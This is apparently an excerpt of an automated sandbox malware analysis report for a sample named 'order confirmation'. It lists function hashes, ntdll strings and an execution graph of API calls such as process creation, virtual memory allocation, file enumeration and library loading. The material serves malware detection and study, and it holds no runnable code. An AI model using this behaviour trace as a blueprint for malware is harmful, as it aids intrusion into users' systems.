                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
                                                    • Instruction ID: a266b93fb5b0c99f81f6d290c39fc841dc06b73669f5991b5f6ee6d91bda4f52
                                                    • Opcode Fuzzy Hash: 1244f56d97af716811ddd555e34c987ca927a22b16d8ce629dd22015651e8d28
                                                    • Instruction Fuzzy Hash: 8651E6B6A00256BFCB11DFAD889097FFBB8BB08244B54826EF565D7A41D334DE5087E0
                                                    Function 01462410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                    • API String ID: 48624451-2108815105
                                                    • Opcode ID: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
                                                    • Instruction ID: f8efc385ed3ec2e773829c9eb5b5935babcb0e74d25c0de1713a568a52301c8e
                                                    • Opcode Fuzzy Hash: 05e39ef9031ce2fec27fb0bf44520a13806ded3187d72957e25f11329f7f395a
                                                    • Instruction Fuzzy Hash: 25510371A00646BACB30DF9DC990D7FBBBCEB44208B40842BE4D6D7791E6B4DA408761
                                                    Function 013E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Execute=1, xrefs: 01424713
                                                    • ExecuteOptions, xrefs: 014246A0
                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 014246FC
                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01424742
                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01424655
                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01424725
                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 01424787
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                    • API String ID: 0-484625025
                                                    • Opcode ID: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
                                                    • Instruction ID: 11faaafb5c500d36b2864bd0e7888c6171748580a3c3028787132119c45e0d9f
                                                    • Opcode Fuzzy Hash: f5720daf4d80a7e41b5c1d3c7c388ea0e12336b8aa7608e19e6113d068406302
                                                    • Instruction Fuzzy Hash: 46512D3160032ABAEF21ABA9DC89FFA77E8EF5431CF44009DD605AB1D1D7719A458F90
                                                    Function 013FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-$0$0
                                                    • API String ID: 1302938615-699404926
                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction ID: 9bb8804a780b6066669730f2c663ed6393cb39a9b6b08c9fe89c0bd8fbe894c0
                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                    • Instruction Fuzzy Hash: 6281D2B0E052498EEF258E6CC8517FEFFB6AF85368F18411DDA61A7299C7348840CB61
                                                    Function 014620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$[$]:%u
                                                    • API String ID: 48624451-2819853543
                                                    • Opcode ID: e4a2608e1c4d5db309166c185c0dac4f8c2b2a2bf2d8e286e7055d29c967d518
                                                    • Instruction ID: f5521f767d0f0a8d1699aebff552ee0d934ce1b637e14d4db1f6d31afeb049e0
                                                    • Opcode Fuzzy Hash: e4a2608e1c4d5db309166c185c0dac4f8c2b2a2bf2d8e286e7055d29c967d518
                                                    • Instruction Fuzzy Hash: 4E2133BAE00119ABDB11DF69D840EFF7BECEF54658F44012AEA05E3254E771DA018BA1
                                                    Function 013DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014202E7
                                                    • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014202BD
                                                    • RTL: Re-Waiting, xrefs: 0142031E
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                    • API String ID: 0-2474120054
                                                    • Opcode ID: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
                                                    • Instruction ID: 83de9d0a39da752d50b8821818be2ffe1f7f1a867784b3b1dee619b13df22e98
                                                    • Opcode Fuzzy Hash: 29e83d5a3b1d43d2b23175c35cfb8ee0c85cf13ac9c3b174e13404390dc6151f
                                                    • Instruction Fuzzy Hash: 78E1CE316047419FD725CF28D884B2ABBE4BB84328F140A1EF5A6CB7E1D774D986CB52
                                                    Function 013EBED0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 129COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 01427B8E
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01427B7F
                                                    • RTL: Re-Waiting, xrefs: 01427BAC
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 0-871070163
                                                    • Opcode ID: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
                                                    • Instruction ID: c1ac3d1430c5b654c7c720bd93a52d2b674140b5de215feed1962bd9980d021c
                                                    • Opcode Fuzzy Hash: 06453a71e0cc922cf444c97b90c55802d08b7bc534851c5eb2f5c55e57faf66c
                                                    • Instruction Fuzzy Hash: 8C4125317007169FDB21CE29C840B27B7E5EF98715F000A1EFA5AD7790DB31E84A8B91
                                                    Function 013EB4C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 121COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0142728C
                                                    Strings
                                                    • RTL: Resource at %p, xrefs: 014272A3
                                                    • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01427294
                                                    • RTL: Re-Waiting, xrefs: 014272C1
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-605551621
                                                    • Opcode ID: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
                                                    • Instruction ID: 7054f2fa225822dde4af37501e61fad5d78da4e837064f67b4bfdc68c9880aaa
                                                    • Opcode Fuzzy Hash: 999527f9837cf713b0891e26e501961bb2672c17ed5e57845da7b24f36e06e2c
                                                    • Instruction Fuzzy Hash: E7411031600326ABD722CF29CC41B26B7A5FBA5715F10061AF945EB3A0DB31E8528BE1
                                                    Function 01462300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
                                                    • Instruction ID: 29cdd1b7ad2176b50c8a595699087541749713fb89703c1eeb08ef207d646bb7
                                                    • Opcode Fuzzy Hash: 33e3c4aa68d691d2a633beebf391008f02696f59e6037772c1e34b2382ef84f3
                                                    • Instruction Fuzzy Hash: 85318472A00219AFDB60DE3DCC40FEF77BCEB54654F84055BE949E3250EB709A848BA1
                                                    Function 013F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: __aulldvrm
                                                    • String ID: +$-
                                                    • API String ID: 1302938615-2137968064
                                                    • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction ID: b741cee594843c46f6816475e7e011b76d5b36f70382c164fa2da48695b9921c
                                                    • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                    • Instruction Fuzzy Hash: 1D91B171E0030A9BEF24DF6DC881ABEBBA5EF44328F54461EEB65E72C0D73099458B11
                                                    Function 013B9126 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $$@
                                                    • API String ID: 0-1194432280
                                                    • Opcode ID: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
                                                    • Instruction ID: 4a2408a5372249086fbc920484b452fca8ab5367028de4c8a4f784e2cdf99e16
                                                    • Opcode Fuzzy Hash: 09ded741acb4b3bbb7aaac159a7e0f6777b34abdd2358d0b194b68fa15e537c5
                                                    • Instruction Fuzzy Hash: 9A811B71D002699BDB359B54CC44BEEBBB4AF08714F1041EAEA1DB7690E7705E85CFA0
                                                    Function 0143CEA0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0143CFBD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.1983329477.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_1380000_order confirmation.jbxd
                                                    Similarity
                                                    • API ID: CallFilterFunc@8
                                                    • String ID: @$@4Qw@4Qw
                                                    • API String ID: 4062629308-2383119779
                                                    • Opcode ID: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                    • Instruction ID: 05a6fb899e12bb1e458dccec4419dd2104abdee034f94a9747c970772526e518
                                                    • Opcode Fuzzy Hash: 6001caa91a27a8e3b0280732b7e7341388d8d3f73a1963e15bc0c2447d547301
                                                    • Instruction Fuzzy Hash: C0419EB1900215DFCB219FA9C840AAEFBB8FF99B58F51402FE904DB264E734D801CB61

                                                    Execution Graph

                                                    Execution Coverage:2.4%
                                                    Dynamic/Decrypted Code Coverage:4.3%
                                                    Signature Coverage:1.6%
                                                    Total number of Nodes:446
                                                    Total number of Limit Nodes:72
                                                    execution_graph 101531 a0b460 101533 a0b46b 101531->101533 101532 a0b48a 101533->101532 101535 a05cb0 101533->101535 101536 a05d11 101535->101536 101538 a05d1e 101536->101538 101539 9f25e0 101536->101539 101538->101532 101540 9f2584 101539->101540 101542 9f25f8 101539->101542 101546 a08cc0 101540->101546 101542->101542 101545 9f25cb 101545->101538 101547 a08cdd 101546->101547 101555 3552c0a 101547->101555 101548 9f25b6 101550 a09750 101548->101550 101551 a0977e 101550->101551 101552 a097e2 101550->101552 101551->101545 101558 3552e80 LdrInitializeThunk 101552->101558 101553 a09813 101553->101545 101556 3552c11 101555->101556 101557 3552c1f LdrInitializeThunk 101555->101557 101556->101548 101557->101548 101558->101553 101559 a093a0 101560 a0945a 101559->101560 101562 a093d2 101559->101562 101561 a09470 NtCreateFile 101560->101561 101563 a059a0 101564 a05a01 101563->101564 101566 a05a0e 101564->101566 101567 9f7660 101564->101567 101568 9f766e 101567->101568 101569 9f760f 101567->101569 101568->101566 101570 9f7652 101569->101570 101572 9fb500 101569->101572 101570->101566 101573 9fb526 101572->101573 101574 9fb749 101573->101574 101599 a09ac0 101573->101599 101574->101570 101576 9fb598 101576->101574 101602 a0c940 101576->101602 101578 9fb5b7 101578->101574 101579 9fb688 101578->101579 101581 a08cc0 LdrInitializeThunk 101578->101581 101580 9fb6a4 101579->101580 101582 9f5e00 LdrInitializeThunk 101579->101582 101588 9fb731 101580->101588 101616 a08830 101580->101616 101583 9fb619 101581->101583 101582->101580 101583->101579 101584 9fb622 101583->101584 101584->101574 101585 9fb670 101584->101585 101586 9fb651 101584->101586 101608 9f5e00 101584->101608 101612 9f83b0 101585->101612 101631 a04940 LdrInitializeThunk 101586->101631 101590 9f83b0 LdrInitializeThunk 101588->101590 101594 9fb73f 101590->101594 101594->101570 101595 9fb708 101621 a088e0 101595->101621 101597 9fb722 101626 a08a40 101597->101626 101600 a09add 101599->101600 101601 a09aee CreateProcessInternalW 101600->101601 101601->101576 101603 a0c8b0 101602->101603 101604 a0c90d 101603->101604 101632 a0b850 101603->101632 101604->101578 101606 a0c8ea 101635 a0b770 101606->101635 101609 9f5e15 101608->101609 101644 a08e90 101609->101644 101611 9f5e3e 101611->101586 101613 9f83c3 101612->101613 101650 a08bc0 101613->101650 101615 9f83ee 101615->101570 101617 a0885b 101616->101617 101618 a088ad 101616->101618 101617->101595 101656 35539b0 LdrInitializeThunk 101618->101656 101619 a088d2 101619->101595 101622 a08960 101621->101622 101624 a0890e 101621->101624 101657 3554340 LdrInitializeThunk 101622->101657 101623 a08985 101623->101597 101624->101597 101627 a08abd 101626->101627 101629 a08a6b 101626->101629 101658 3552fb0 LdrInitializeThunk 101627->101658 101628 a08ae2 101628->101588 101629->101588 101631->101585 101638 a099e0 101632->101638 101634 a0b86b 101634->101606 101641 a09a30 101635->101641 101637 a0b789 101637->101604 101639 a099fd 101638->101639 101640 a09a0e RtlAllocateHeap 101639->101640 101640->101634 101642 a09a4d 101641->101642 101643 a09a5e RtlFreeHeap 101642->101643 101643->101637 101645 a08f41 101644->101645 101647 a08ebf 101644->101647 101649 3552d10 LdrInitializeThunk 101645->101649 101646 a08f86 101646->101611 101647->101611 101649->101646 101651 a08c41 101650->101651 101653 a08bee 101650->101653 101655 3552dd0 LdrInitializeThunk 101651->101655 101652 a08c66 101652->101615 101653->101615 101655->101652 101656->101619 101657->101623 101658->101628 101659 a00320 101660 a0033d 101659->101660 101663 9f4820 101660->101663 101662 a0035b 101664 9f4844 101663->101664 101665 9f484b 101664->101665 101666 9f4880 LdrLoadDll 101664->101666 101665->101662 101666->101665 101667 a01960 101668 a0197c 101667->101668 101669 a019a4 101668->101669 101670 a019b8 101668->101670 101671 a096b0 NtClose 101669->101671 101677 a096b0 101670->101677 101673 a019ad 101671->101673 101674 a019c1 101680 a0b890 RtlAllocateHeap 101674->101680 101676 a019cc 101678 a096ca 101677->101678 101679 a096db NtClose 101678->101679 101679->101674 101680->101676 101681 3552ad0 LdrInitializeThunk 101682 9f2a57 101685 9f6590 101682->101685 101684 9f2a80 101686 9f65c3 101685->101686 101687 9f65e7 101686->101687 101692 a09200 101686->101692 101687->101684 101689 9f660a 101689->101687 101690 a096b0 NtClose 101689->101690 101691 9f668c 101690->101691 101691->101684 101693 a0921a 101692->101693 101696 3552ca0 LdrInitializeThunk 101693->101696 101694 a09246 101694->101689 101696->101694 101697 9eb810 101700 a0b6e0 101697->101700 101699 9ece81 101703 a09820 101700->101703 101702 a0b711 101702->101699 101704 a0984b 101703->101704 101705 a098b5 101703->101705 101704->101702 101706 a098cb NtAllocateVirtualMemory 101705->101706 101706->101702 101707 9fafd0 101712 9face0 101707->101712 101709 9fafdd 101726 9fa960 101709->101726 101711 9faff9 101713 9fad05 101712->101713 101737 9f8620 101713->101737 101716 9fae53 101716->101709 101718 9fae6a 101718->101709 101719 9fae61 101719->101718 101721 9faf57 101719->101721 101756 9fa3b0 101719->101756 101723 9fafba 101721->101723 101765 9fa720 101721->101765 101724 a0b770 RtlFreeHeap 101723->101724 101725 9fafc1 101724->101725 101725->101709 101727 9fa976 101726->101727 101730 9fa981 101726->101730 101728 a0b850 RtlAllocateHeap 101727->101728 101728->101730 101729 9fa9a2 101729->101711 101730->101729 101731 9f8620 GetFileAttributesW 101730->101731 101732 9facb2 101730->101732 101735 9fa3b0 RtlFreeHeap 101730->101735 101736 9fa720 RtlFreeHeap 101730->101736 101731->101730 101733 9faccb 101732->101733 101734 a0b770 RtlFreeHeap 101732->101734 101733->101711 101734->101733 101735->101730 101736->101730 101738 9f863d 101737->101738 101739 9f8644 GetFileAttributesW 101738->101739 101740 9f864f 101738->101740 101739->101740 101740->101716 101741 a03520 101740->101741 101742 a0352e 101741->101742 101743 a03535 101741->101743 101742->101719 101744 9f4820 LdrLoadDll 101743->101744 101745 a0356a 101744->101745 101746 a03579 101745->101746 101769 a02fe0 LdrLoadDll 101745->101769 101748 a0b850 RtlAllocateHeap 101746->101748 101752 a03724 101746->101752 101749 a03592 101748->101749 101750 a0371a 101749->101750 101749->101752 101753 a035ae 101749->101753 101751 a0b770 RtlFreeHeap 101750->101751 101750->101752 101751->101752 101752->101719 101753->101752 101754 a0b770 RtlFreeHeap 101753->101754 101755 a0370e 101754->101755 101755->101719 101757 9fa3d6 101756->101757 101770 9fddb0 101757->101770 101759 9fa448 101761 9fa5d0 101759->101761 101763 9fa466 101759->101763 101760 9fa5b5 101760->101719 101761->101760 101762 9fa270 RtlFreeHeap 101761->101762 101762->101761 101763->101760 101775 9fa270 101763->101775 101766 9fa746 101765->101766 101767 9fddb0 RtlFreeHeap 101766->101767 101768 9fa7cd 101767->101768 101768->101721 101769->101746 101772 9fddd4 101770->101772 101771 9fdde1 101771->101759 101772->101771 101773 a0b770 RtlFreeHeap 101772->101773 101774 9fde1e 101773->101774 101774->101759 101776 9fa28d 101775->101776 101779 9fde30 101776->101779 101778 9fa393 101778->101763 101781 9fde54 101779->101781 101780 9fdefe 101780->101778 101781->101780 101782 a0b770 RtlFreeHeap 101781->101782 101782->101780 101788 a01cf0 101792 a01d09 101788->101792 101789 a01d51 101790 a0b770 RtlFreeHeap 101789->101790 101791 a01d61 101790->101791 101792->101789 101793 a01d94 101792->101793 101795 a01d99 101792->101795 101794 a0b770 RtlFreeHeap 101793->101794 101794->101795 101796 a08af0 101797 a08b82 101796->101797 101798 a08b1e 101796->101798 101801 3552ee0 LdrInitializeThunk 101797->101801 101799 a08bb3 101801->101799 101802 a06230 101803 a0628a 101802->101803 101805 a06297 101803->101805 101806 a03c40 101803->101806 101807 a0b6e0 NtAllocateVirtualMemory 101806->101807 101809 a03c81 101807->101809 101808 a03d8e 101808->101805 101809->101808 101810 9f4820 LdrLoadDll 101809->101810 101812 a03cc7 101810->101812 101811 a03d10 Sleep 101811->101812 101812->101808 101812->101811 101813 a08c70 101814 a08c8d 101813->101814 101817 3552df0 LdrInitializeThunk 101814->101817 101815 a08cb5 101817->101815 101818 a0c870 101819 a0b770 RtlFreeHeap 101818->101819 101820 a0c885 101819->101820 101821 9f9ecb 101822 9f9ed1 101821->101822 101823 9f9efd 101822->101823 101824 a0b770 RtlFreeHeap 101822->101824 101824->101823 101825 9f8ac7 101826 9f8a81 101825->101826 101826->101825 101827 9f8af1 101826->101827 101829 9f7380 101826->101829 101830 9f73cf 101829->101830 101831 9f7396 101829->101831 101830->101826 101831->101830 101833 9f71f0 LdrLoadDll 101831->101833 101833->101830 101834 9e9e40 101836 9e9e4f 101834->101836 101835 9e9e8c 101836->101835 101837 9e9e79 CreateThread 101836->101837 101838 9f5e80 101839 9f83b0 LdrInitializeThunk 101838->101839 101841 9f5eb0 101839->101841 101842 9f5edc 101841->101842 101843 9f8330 101841->101843 101844 9f8374 101843->101844 101845 9f8395 101844->101845 101850 a08990 101844->101850 101845->101841 101847 9f8385 101848 9f83a1 101847->101848 101849 a096b0 NtClose 101847->101849 101848->101841 101849->101845 101851 a08a10 101850->101851 101852 a089be 101850->101852 101855 3554650 LdrInitializeThunk 101851->101855 101852->101847 101853 a08a35 101853->101847 101855->101853 101856 9f7400 101857 9f7414 101856->101857 101859 a096b0 NtClose 101857->101859 101865 9f746f 101857->101865 101858 9f75a7 101860 9f7437 101859->101860 101866 9f6820 NtClose LdrInitializeThunk LdrInitializeThunk 101860->101866 101862 9f7581 101862->101858 101868 9f69f0 NtClose LdrInitializeThunk LdrInitializeThunk 101862->101868 101865->101858 101867 9f6820 NtClose LdrInitializeThunk LdrInitializeThunk 101865->101867 101866->101865 101867->101862 101868->101858 101870 a09610 101871 a09687 101870->101871 101873 a0963b 101870->101873 101872 a0969d NtDeleteFile 101871->101872 101879 a09510 101880 a095ba 101879->101880 101881 a0953e 101879->101881 101882 a095d0 NtReadFile 101880->101882 101885 9f33e3 101890 9f8030 101885->101890 101888 a096b0 NtClose 101889 9f340f 101888->101889 101891 9f33f3 101890->101891 101892 9f804a 101890->101892 101891->101888 101891->101889 101896 a08d60 101892->101896 101895 a096b0 NtClose 101895->101891 101897 a08d7d 101896->101897 101900 35535c0 LdrInitializeThunk 101897->101900 101898 9f811a 101898->101895 101900->101898 101901 9e9ea0 101902 9ea32a 101901->101902 101904 9ea7c4 101902->101904 101905 a0b3d0 101902->101905 101906 a0b3f6 101905->101906 101911 9e4140 101906->101911 101908 a0b402 101909 a0b43b 101908->101909 101914 a057c0 101908->101914 101909->101904 101913 9e414d 101911->101913 101918 9f34e0 101911->101918 101913->101908 101915 a05822 101914->101915 101917 a0582f 101915->101917 101929 9f1ce0 101915->101929 101917->101909 101919 9f34fd 101918->101919 101921 9f3516 101919->101921 101922 a0a130 101919->101922 101921->101913 101924 a0a14a 101922->101924 101923 a0a179 101923->101921 101924->101923 101925 a08cc0 LdrInitializeThunk 101924->101925 101926 a0a1d6 101925->101926 101927 a0b770 RtlFreeHeap 101926->101927 101928 a0a1ef 101927->101928 101928->101921 101930 9f1d1b 101929->101930 101945 9f8140 101930->101945 101932 9f1d23 101933 a0b850 RtlAllocateHeap 101932->101933 101943 9f1ff6 101932->101943 101934 9f1d39 101933->101934 101935 a0b850 RtlAllocateHeap 101934->101935 101936 9f1d4a 101935->101936 101937 a0b850 RtlAllocateHeap 101936->101937 101938 9f1d5b 101937->101938 101944 9f1df2 101938->101944 101960 9f6cf0 NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 101938->101960 101940 9f4820 LdrLoadDll 101941 9f1fa2 101940->101941 101956 a08100 101941->101956 101943->101917 101944->101940 101946 9f816c 101945->101946 101947 9f8030 2 API calls 101946->101947 101948 9f818f 101947->101948 101949 9f8199 101948->101949 101950 9f81b1 101948->101950 101951 9f81a4 101949->101951 101953 a096b0 NtClose 101949->101953 101952 9f81cd 101950->101952 101954 a096b0 NtClose 101950->101954 101951->101932 101952->101932 101953->101951 101955 9f81c3 101954->101955 101955->101932 101957 a08162 101956->101957 101959 a0816f 101957->101959 101961 9f2010 101957->101961 101959->101943 101960->101944 101977 9f8410 101961->101977 101963 9f2563 101963->101959 101964 9f2030 101964->101963 101981 a01330 101964->101981 101967 9f223c 101968 a0c940 2 API calls 101967->101968 101971 9f2251 101968->101971 101969 9f2088 101969->101963 101984 a0c810 101969->101984 101970 9f83b0 LdrInitializeThunk 101973 9f2298 101970->101973 101971->101973 101989 9f0b30 101971->101989 101973->101963 101973->101970 101974 9f0b30 LdrInitializeThunk 101973->101974 101974->101973 101975 9f83b0 LdrInitializeThunk 101976 9f23e9 101975->101976 101976->101973 101976->101975 101978 9f841d 101977->101978 101979 9f843a SetErrorMode 101978->101979 101980 9f8441 101978->101980 101979->101980 101980->101964 101982 a0b6e0 NtAllocateVirtualMemory 101981->101982 101983 a01351 101982->101983 101983->101969 101985 a0c820 101984->101985 101986 a0c826 101984->101986 101985->101967 101987 a0b850 RtlAllocateHeap 101986->101987 101988 a0c84c 101987->101988 101988->101967 101992 a09940 101989->101992 101993 a0995a 101992->101993 101996 3552c70 LdrInitializeThunk 101993->101996 101994 9f0b52 101994->101976 101996->101994 101997 9f10a0 101998 9f10b9 101997->101998 101999 9f4820 LdrLoadDll 101998->101999 102000 9f10d7 101999->102000 102001 9f1123 102000->102001 102002 9f1110 PostThreadMessageW 102000->102002 102002->102001 102003 9ffa60 102004 9ffac4 102003->102004 102005 9f6590 2 API calls 102004->102005 102007 9ffbf7 102005->102007 102006 9ffbfe 102007->102006 102032 9f66a0 102007->102032 102009 9ffc7a 102010 9ffdb2 102009->102010 102030 9ffda3 102009->102030 102036 9ff840 102009->102036 102011 a096b0 NtClose 102010->102011 102013 9ffdbc 102011->102013 102014 9ffcb6 102014->102010 102015 9ffcc1 102014->102015 102016 a0b850 RtlAllocateHeap 102015->102016 102017 9ffcea 102016->102017 102018 9ffd09 102017->102018 102019 9ffcf3 102017->102019 102045 9ff730 CoInitialize 102018->102045 102020 a096b0 NtClose 102019->102020 102022 9ffcfd 102020->102022 102023 9ffd17 102048 a09160 102023->102048 102025 9ffd92 102026 a096b0 NtClose 102025->102026 102027 9ffd9c 102026->102027 102029 a0b770 RtlFreeHeap 102027->102029 102028 9ffd35 102028->102025 102031 a09160 LdrInitializeThunk 102028->102031 102029->102030 102031->102028 102033 9f66c5 102032->102033 102052 a08fe0 102033->102052 102037 9ff85c 102036->102037 102038 9f4820 LdrLoadDll 102037->102038 102040 9ff87a 102038->102040 102039 9ff883 102039->102014 102040->102039 102041 9f4820 LdrLoadDll 102040->102041 102042 9ff94e 102041->102042 102043 9f4820 LdrLoadDll 102042->102043 102044 9ff9a8 102042->102044 102043->102044 102044->102014 102047 9ff795 102045->102047 102046 9ff82b CoUninitialize 102046->102023 102047->102046 102049 a0917a 102048->102049 102057 3552ba0 LdrInitializeThunk 102049->102057 102050 a091aa 102050->102028 102053 a08ffa 102052->102053 102056 3552c60 LdrInitializeThunk 102053->102056 102054 9f6739 102054->102009 102056->102054 102057->102050 102058 9f7060 102059 9f708a 102058->102059 102062 9f81e0 102059->102062 102061 9f70b4 102063 9f81fd 102062->102063 102069 a08db0 102063->102069 102065 9f824d 102066 9f8254 102065->102066 102067 a08e90 LdrInitializeThunk 102065->102067 102066->102061 102068 9f827d 102067->102068 102068->102061 102070 a08e4e 102069->102070 102072 a08dde 102069->102072 102074 3552f30 LdrInitializeThunk 102070->102074 102071 a08e87 102071->102065 102072->102065 102074->102071 102075 9fc860 102077 9fc889 102075->102077 102076 9fc981 102077->102076 102078 9fc927 FindFirstFileW 102077->102078 102078->102076 102081 9fc942 